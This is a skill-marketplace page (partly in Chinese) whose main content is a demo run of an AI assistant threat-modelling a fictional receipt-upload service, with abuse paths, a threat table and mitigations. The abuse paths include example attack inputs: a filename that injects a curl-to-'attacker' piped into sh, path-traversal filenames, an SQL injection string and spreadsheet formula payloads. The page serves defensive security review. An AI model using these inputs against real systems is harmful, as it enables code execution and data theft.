首页 / Skills / 开发提效 / 安全威胁建模 Security Threat Model
开发提效

安全威胁建模 Security Threat Model

OpenAIApache-2.0Skill 语言: 英文
协议已核对不含脚本中风险
演示真实运行记录 · claude-sonnet-5-5 · 2026年10月
Please threat model this small service. It is an internal "expense receipts" web app. Context I can already give you so you don't need to ask: it runs in a company VPC behind a reverse proxy, only employees with SSO can log in, about 400 users, receipts are images and PDFs that contain personal data and bank card fragments, single-tenant. Out of scope: the SSO provider and the cloud account. Repository layout and the key code (this is all of it): app/main.py @app.post("/upload") def upload(file: UploadFile, user=Depends(current_user)): path = os.path.join(UPLOAD_DIR, file.filename) with open(path, "wb") as f: f.write(file.file.read()) job_queue.enqueue(ocr_receipt, path, user.id) return {"ok": True} @app.get("/receipt/{name}") def get_receipt(name: str, user=Depends(current_user)): return FileResponse(os.path.join(UPLOAD_DIR, name)) @app.get("/admin/export") def export(user=Depends(current_user)): if user.email.endswith("@company.com"): return db.query("SELECT * FROM expenses").to_csv() app/worker.py def ocr_receipt(path, user_id): text = subprocess.run(f"tesseract {path} - ", shell=True, capture_output=True).stdout db.execute(f"INSERT INTO expenses (user_id, raw_text) VALUES ({user_id}, '{text}')") config.py SECRET_KEY = os.environ["SECRET_KEY"]; DB_URL = os.environ["DB_URL"]; UPLOAD_DIR = "/data/uploads" Dockerfile runs as root; the image installs tesseract from apt and pins no dependency versions.
Skill: security-threat-model
Read: references/prompt-template.md

I'm skipping the assumption check-in the skill normally calls for, because you said not to ask and gave the context up front. The remaining assumptions are listed below, and the conclusions that depend on them are marked. I also couldn't write skill-trial-icjul6yt-threat-model.md, because I have no file-write tool in this session. The full report is below, and you can save it as is.


Executive summary

Any logged-in employee can get code execution as root, and the code has three separate paths to it. They are an unsanitised upload filename (arbitrary file write), shell=True with that same filename in the worker, and SQL built by f-string from OCR text the attacker controls. With the container's SECRET_KEY and DB_URL, that becomes full access to all receipts and the database. Separately, /admin/export checks only for the @company.com suffix, which every employee has, so the admin check does nothing. /receipt/{name} has no ownership check, so any employee can read anyone's receipts. The VPC and SSO shrink the attacker pool to employees and compromised employee accounts. They don't change what that attacker can reach, and there are no per-user boundaries behind the login.

Scope and assumptions

  • In scope: app/main.py, app/worker.py, config.py, the Dockerfile and its build and dependency handling. The runtime and build paths are covered together because the Dockerfile is the only build artifact.
  • Out of scope (per you): the SSO provider and the cloud account.
  • Assumptions:
    • The framework is FastAPI/Starlette, inferred from @app.post, Depends and FileResponse.
    • job_queue is a Redis-backed queue (RQ or similar). The code doesn't show it.
    • The web app and the worker run from the same root image, with SECRET_KEY and DB_URL in both environments.
    • /data/uploads is a shared persistent volume.
    • The reverse proxy enforces no body-size, filename or content-type rules.
    • current_user is derived from SSO headers or a session, and its internals weren't provided.
    • Users are mostly honest, but one phished or malicious account is a realistic starting point.
  • Open questions that would change the ranking:
    1. Are there roles beyond "employee", such as finance or admin, and who should be able to call /admin/export?
    2. Does the worker or Redis hold credentials with reach beyond this app, such as a broad DB user, cloud instance role or network access to other internal services?
    3. Can contractors or other non-company.com identities authenticate through SSO? This affects TM-005.

System model

Primary components

  • Reverse proxy: TLS and SSO enforcement (assumed).
  • Web API: app/main.py with /upload, /receipt/{name} and /admin/export.
  • Job queue: job_queue.enqueue(ocr_receipt, path, user.id).
  • OCR worker: app/worker.py, which shells out to tesseract.
  • File store: /data/uploads (config.py: UPLOAD_DIR).
  • Database: an expenses table reached through DB_URL.
  • Container: runs as root, and tesseract is installed from apt with unpinned versions.

Data flows and trust boundaries

  • Employee browser → Reverse proxy → Web API
    • Data crossing: SSO session, multipart file with an attacker-chosen filename, path parameters.
    • Channel: HTTPS (assumed).
    • Guarantees: SSO authentication only.
    • Validation: none. file.filename, file size and file type are not checked, and name is not checked.
  • Web API → File store
    • Data crossing: raw receipt bytes written to os.path.join(UPLOAD_DIR, file.filename).
    • Channel: local filesystem, as root.
    • Guarantees: none. There is no path canonicalisation, ownership record or collision handling. An absolute filename makes os.path.join discard UPLOAD_DIR.
  • Web API → Job queue → Worker
    • Data crossing: path string and user_id.
    • Channel: Redis or similar (assumed).
    • Guarantees: unknown. The queue is likely unauthenticated inside the VPC, and RQ-style queues pickle their payloads.
  • Worker → tesseract (subprocess)
    • Data crossing: the path is interpolated into a shell string with shell=True. The image content is parsed by tesseract and its libraries.
    • Guarantees: none. There is no argument list, no sandbox and no resource limits.
  • Worker → Database
    • Data crossing: OCR text, which comes from attacker-supplied images, interpolated into SQL by f-string.
    • Guarantees: none. There is no parameterisation, and text is bytes, so the stored value is b'...'.
  • Web API → Employee (/receipt, /export)
    • Data crossing: receipt files, plus a CSV of every expense.
    • Guarantees: authentication only. There is no per-user authorisation on /receipt, and the check on /export is trivially satisfied.

Diagram

flowchart LR
  subgraph Untrusted
    U["Employee browser"]
  end
  subgraph VPC
    P["Reverse proxy SSO"]
    W["Web API"]
    Q["Job queue"]
    K["OCR worker"]
    T["Tesseract"]
    F["Upload volume"]
    D["Expenses DB"]
  end
  U --> P
  P --> W
  W --> F
  W --> Q
  W --> D
  Q --> K
  K --> T
  T --> F
  K --> D

Assets and security objectives

Asset Why it matters Objective
Receipt files in /data/uploads Personal data and bank card fragments C, I
expenses table Financial records and OCR text with PII C, I
SECRET_KEY, DB_URL (env) Session or signing compromise, direct DB access C
Container and host runtime (root) Foothold for lateral movement inside the VPC C, I, A
Application code and image Overwriting it gives persistent code execution I
Queue contents Tampering gives code execution in the worker I
Service availability Expense submission halts A

Attacker model

Capabilities

  • Any authenticated employee, which covers roughly 400 people, a phished or compromised account, or a malicious insider.
  • Full control over the filename, content and size of uploads.
  • Free choice of name on /receipt/{name}.
  • Free choice of the text inside an uploaded image, which OCR passes through to SQL.

Non-capabilities

  • No anonymous or internet access, since the service is behind the VPC and SSO.
  • No compromise of the SSO provider or cloud account (out of scope).
  • No direct network access to the DB or queue at the start. Reaching them requires first getting code execution in the app.

Entry points and attack surfaces

Surface How reached Trust boundary Notes Evidence
Upload filename POST /upload multipart Browser → API → FS Path traversal, absolute path, overwrite of other users' files, shell metacharacters app/main.py: upload, os.path.join(UPLOAD_DIR, file.filename)
Upload content POST /upload API → Worker → tesseract No size or type limit, parser attack surface, OCR text flows into SQL app/main.py: upload, app/worker.py: ocr_receipt
Shell invocation Queue job Worker → OS Command injection through the path subprocess.run(f"tesseract {path} - ", shell=True ...)
SQL insert Queue job Worker → DB Injection from OCR text db.execute(f"INSERT ... '{text}'")
Receipt read GET /receipt/{name} API → FS → Browser No ownership check. Content type is guessed from the extension, so an uploaded .html or .svg is served from the app origin app/main.py: get_receipt, FileResponse
Admin export GET /admin/export API → DB → Browser endswith("@company.com") passes for everyone. Non-matching users get a null 200. CSV is built from attacker-influenced raw_text app/main.py: export
Queue Redis or similar Network → Worker Unauthenticated access allows job forgery (assumed) job_queue.enqueue
Build Dockerfile Supply chain Root user, unpinned apt and pip, no image scanning Dockerfile

Top abuse paths

  1. Arbitrary file write to RCE as root:
    1. Upload with filename ../../app/main.py, or an absolute path like /app/app/main.py.
    2. The app overwrites its own code, or a .pth file, cron entry or similar.
    3. On the next restart or import, the attacker has root code execution.
    4. They read SECRET_KEY and DB_URL and dump everything.
  2. Command injection in the worker:
    1. Upload a file named x;curl attacker|sh;.png.
    2. ocr_receipt runs tesseract x;curl attacker|sh;.png - through the shell.
    3. This gives root RCE in the worker, with DB and queue access.
  3. SQL injection via OCR text:
    1. Upload an image that renders the text '); UPDATE expenses SET ... --, or a subquery that copies other rows into this record's raw_text.
    2. The worker interpolates it into SQL.
    3. The attacker tampers with financial records, or reads other users' rows through their own /export or record view.
  4. Mass PII read through the broken admin check:
    1. Any employee calls /admin/export.
    2. The @company.com suffix check passes.
    3. They receive a CSV of every user's OCR text, including card fragments and personal data.
  5. Cross-user receipt read (IDOR):
    1. Enumerate or guess filenames. They are user-chosen, often receipt.pdf, IMG_0001.jpg.
    2. Call GET /receipt/{name} and read other employees' receipts.
  6. Stored XSS to admin actions:
    1. Upload evil.html containing JavaScript.
    2. Send the /receipt/evil.html link to a target.
    3. The script runs on the app origin with the victim's session, calls /admin/export, and exfiltrates the result.
  7. Receipt tampering:
    1. Upload a file with the same name as a victim's receipt.
    2. It silently overwrites the original, which is an integrity break for financial evidence with no audit trail.
  8. DoS and parser exploitation:
    1. Upload huge or malformed files.
    2. The disk fills, the worker stalls, or a vulnerable image library crashes or is exploited, because dependencies are unpinned, outdated or patchable only on rebuild.
  9. CSV formula injection:
    1. A receipt's OCR text starts with =HYPERLINK(...) or =cmd|....
    2. Finance opens the export in Excel and the formula executes.

Threat model table

ID Source Prerequisites Threat action Impact Assets Existing controls Gaps Recommended mitigations Detection Likelihood Impact sev. Priority
TM-001 Authenticated employee Valid SSO login Path traversal or absolute path via file.filename writes arbitrary files as root Root RCE, code overwrite, receipt overwrite Code, receipts, secrets SSO only No filename sanitising, no canonicalisation, runs as root Ignore client filename. Store as <uuid><allowed-ext>, keep the original name in the DB. Verify realpath is under UPLOAD_DIR. Run as non-root with a read-only code filesystem Alert on writes outside UPLOAD_DIR; file integrity monitoring High High critical
TM-002 Authenticated employee Valid login Shell metacharacters in the filename reach shell=True Root RCE in the worker Worker, DB, queue, secrets None shell=True with an f-string Use subprocess.run(["tesseract", path, "-"], shell=False, timeout=...), with server-generated filenames Alert on unexpected child processes and egress from the worker High High critical
TM-003 Authenticated employee Valid login OCR text containing SQL is interpolated into INSERT Data tampering, cross-user data exposure, possible DB-level execution depending on DB expenses, DB None f-string SQL, bytes repr stored Parameterised query, text.decode(errors="replace"). Use a least-privilege DB user (INSERT only) for the worker DB query logging, anomaly alerts on odd statements High High critical
TM-004 Authenticated employee Valid login Any user calls /admin/export Full PII and card-fragment exfiltration expenses, privacy compliance endswith("@company.com") The check passes for everyone, no role, returns null instead of 403 Real role check from the IdP group or claim, 403 on failure, audit-log every export, rate limit Alert on /admin/export by non-finance identities High High critical
TM-005 Authenticated employee or lookalike identity Employee login, or a non-company identity if SSO allows IDOR on /receipt/{name}, plus HTML/SVG upload served from the app origin Cross-user PII read, stored XSS to admin actions Receipts, sessions Authentication only No ownership mapping, content type guessed from the extension Store (receipt_id, owner_id), authorise on read, serve by opaque id. Allowlist types (jpg, png, pdf), force Content-Disposition: attachment and X-Content-Type-Options: nosniff, serve from a separate origin Log receipt reads with user and owner mismatch High Medium–High high
TM-006 Authenticated employee Valid login Oversized or malformed uploads, or a tesseract/library exploit Disk exhaustion, worker stall, possible parser RCE Availability, worker None No size limit, type check, timeout or quota Size cap at the proxy and app, magic-byte validation, per-user quota, worker timeouts and memory limits, run tesseract in a sandbox (separate container, seccomp, no network) Disk and queue depth alerts, worker crash metrics Medium Medium medium
TM-007 Network attacker inside the VPC, or post-compromise Network reach to the queue (assumed) Forge or modify queue jobs, for example with pickled payloads Worker RCE Worker, DB Unknown (the VPC) No evidence of queue authentication or TLS Queue authentication and network policy, JSON-only job payloads, restrict the queue to web and worker Alert on unexpected queue clients Low–Medium High medium (conditional on queue config)
TM-008 Developer, supply chain Compromised or vulnerable package or apt state at build time Unpinned packages pulled at build Backdoored or vulnerable image, non-reproducible builds Image, all runtime assets None No pins or hashes, root user Pin versions and hashes (lockfile), pinned base image digest, image scanning in CI, non-root user Image scan alerts, SBOM diffs Low High medium
TM-009 Authenticated employee Valid login, and a finance user opening the CSV in a spreadsheet Formula injection through raw_text in the CSV Code execution or data exfiltration on the finance user's workstation Finance endpoints None No CSV escaping Prefix cells beginning with = + - @ \t \r with '. Provide the export as XLSX or sanitised CSV n/a Low–Medium Medium medium
TM-010 Any actor Any of the above Cannot reconstruct who uploaded, read or exported what Weak forensics and accountability for PII access Audit log None No logging at all Structured audit log of upload, read and export with user id, receipt id, source IP and outcome. Ship it off the box n/a High Medium medium

Criticality calibration

  • Critical means code execution, or reading or modifying all receipts and expenses, by any employee.
    • Examples: TM-001 (traversal to RCE), TM-002 (command injection), TM-004 (open admin export).
  • High means exposure of other users' PII or a path to privileged actions, but with narrower reach.
    • Examples: cross-user receipt reads, stored XSS that rides an admin session, a DB role that allows reading cloud metadata.
  • Medium means disruption, or an issue that needs a further precondition.
    • Examples: disk-filling uploads, an unauthenticated queue (if the network allows it), unpinned dependency drift.
  • Low means limited impact or an unlikely precondition.
    • Examples: version disclosure in errors, missing security headers on non-sensitive responses, verbose 500 pages.

Focus paths for security review

Path Why it matters Related threats
app/main.py (upload) Unsanitised file.filename, no size or type limits, no ownership recorded TM-001, TM-006, TM-007
app/main.py (get_receipt) No ownership check, content type guessed from the extension TM-005
app/main.py (export) Ineffective authorisation, CSV injection TM-004, TM-009
app/worker.py (ocr_receipt) shell=True, SQL f-string, runs tesseract on untrusted files TM-002, TM-003, TM-006
config.py Secrets are in the environment, so a root RCE reads them immediately TM-001, TM-002
Dockerfile Runs as root, unpinned dependencies, no hardening TM-001, TM-008
Wherever current_user and job_queue are defined (not provided) Authentication semantics and queue transport and trust TM-005, TM-007

Quality check

  • Entry points: upload, receipt read, export, queue and build are all covered.
  • Trust boundaries: each one in the diagram appears in at least one threat.
  • Runtime vs build: TM-008 is the only build-time item. The rest is runtime.
  • User clarifications: your context is reflected throughout. Open questions are listed in "Scope and assumptions", and none were answered.
  • Assumptions: the framework, queue type, shared root image, proxy behaviour and current_user internals remain unverified.

If you want a fix order, I'd go TM-004, TM-002, TM-001, TM-003, then TM-005. All five are small code changes. The first four are about a line or a few lines each, and TM-005 needs an owner column on the receipts.

Real run in an isolated folder with only this skill installed. Only the Skill and Read tools were enabled, so no command was run and no file was written. The scenario is fictional. The code and context were pasted into the request, not read from a real repository. The model could not write the report file, so it printed the report instead.

它做什么

生成一份针对你这个仓库的应用安全(AppSec)威胁模型,而不是泛泛的检查清单。它从代码里梳理出组件、数据流和信任边界,列出真正重要的资产,以及攻击者现实中能做和不能做的事,然后把威胁列成攻击路径,并给出可能性、影响和优先级。每一条关于系统的说法都必须能在仓库里找到证据(路径、符号或配置项),确认不了的就明说是假设。

怎么工作

写最终报告之前,它会先总结关键假设,并提出一到三个针对性的问题(部署方式、暴露面、数据敏感度、角色)。报告结构固定:摘要、带 Mermaid 图的系统模型、资产、攻击者模型、入口点、主要攻击路径、带固定编号的威胁表、危急程度标定,以及值得人工重点审查的路径。

适合什么场景

服务上线前的审查、准备安全评审,以及在不熟悉的代码库里找出该先看哪里。它用于明确的威胁建模请求,不是通用的代码评审。

说明与风险

中风险:它会让 AI 在你指定的代码仓库里搜索,最后写出一个 Markdown 报告文件(<仓库名>-threat-model.md)。它要读代码和配置,仓库里的密钥可能被 AI 看到;Skill 要求把密钥打码,但请只对你愿意交给所用 AI 工具的代码使用。它不会运行代码,也不会扫描线上系统。威胁模型是基于代码和你的回答做出的分析,不是安全审计或渗透测试,排序依赖于你需要确认的假设。OpenAI 原作(Apache-2.0),未做修改。已用一个虚构的小应用试用过一次,代码是粘贴进去的,试用中模型无法写出文件。